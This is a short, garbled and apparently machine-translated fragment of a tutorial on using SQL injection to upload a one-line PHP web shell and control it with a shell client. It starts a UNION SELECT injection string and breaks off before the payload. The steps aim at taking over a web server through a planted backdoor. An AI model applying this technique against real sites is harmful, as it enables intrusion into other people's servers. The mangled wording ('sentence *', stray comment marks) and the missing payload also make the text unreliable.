Manual exploitation of SQL inject vulnerabilities: get shell
Idea: upload a "backdoor" and control the backdoor to get the shell, such as the sentence *. For example:
/ / submit via request and execute shell
/ / PHP one sentence *, serve the kitchen knife directly
The following statement is constructed here:
1'and 1, 2 union select "